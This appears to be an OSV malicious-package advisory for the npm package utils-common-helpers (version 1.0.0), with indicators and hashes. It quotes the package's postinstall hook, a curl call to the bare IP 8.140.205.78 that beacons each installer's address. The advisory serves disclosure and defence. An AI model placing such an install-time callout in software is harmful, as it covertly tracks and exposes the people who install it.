MAL-2026-5911

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/utils-common-helpers/MAL-2026-5911.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5911

Published

2026-06-16T17:36:03Z

Modified

2026-06-16T18:16:52.383881845Z

Summary

Malicious code in utils-common-helpers (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584)

package.json declares a postinstall lifecycle hook that runs curl -s http://8.140.205.78 -o /dev/null on every install. The package's only functional code is a trivial hello() helper in index.js that returns the string 'hello', which is inconsistent with the declared purpose of 'Common utility helpers for frontend projects'. The lifecycle network call has no relation to any advertised functionality and serves only to disclose the installer's public IP address and install timing to the operator of the bare IP 8.140.205.78. This is a classic install-counter / victim-discovery beacon pattern: a throwaway lure package whose real purpose is the install-time callout. Plain HTTP to a bare IP (no TLS, no domain, no documented purpose) is inconsistent with any legitimate telemetry shape.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T17:36:03Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-006802",
            "import_time": "2026-06-16T18:10:21.252996815Z"
        }
    ]
}

References

https://www.npmjs.com/package/utils-common-helpers/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / utils-common-helpers

Package

Name: utils-common-helpers; View open source insights on deps.dev
Purl: pkg:npm/utils-common-helpers

Affected ranges

Affected versions

1.*

1.0.0

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/utils-common-helpers/MAL-2026-5911.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "1ba6e1d9d7952c1490d10a95e55cf2a26ed6e6b23dbf5173f70a93f0a5d8816d",
            "tlsh": "54e07d3001209933a6dc97050e7d6105a6f24f1a128079182347112903ccbb554bfb0e",
            "path": "package.json"
        },
        {
            "sha256": "eb1ace7b2e955bdfe16f8232de9e385b0b9ebb7efd75cedd7ed8bbb2b4d8b52f",
            "tlsh": "ec90043153743355553ccc00f540541734d54c400507c405034cd5cc7050c3400c44c4",
            "path": "index.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-0TcXzqhu9N5QOIeRFSgZ1axG/f9lEVLbRHFg1FvOWLJyUWet/0qcA9zmyGMq/1C7k0RwUw1eL2lhyzhhNodtig==",
                "sha1": "19bfc8115ef15b0e29e62893877e788d4a7c2f21"
            },
            "filename": "utils-common-helpers-1.0.0.tgz"
        }
    ]
}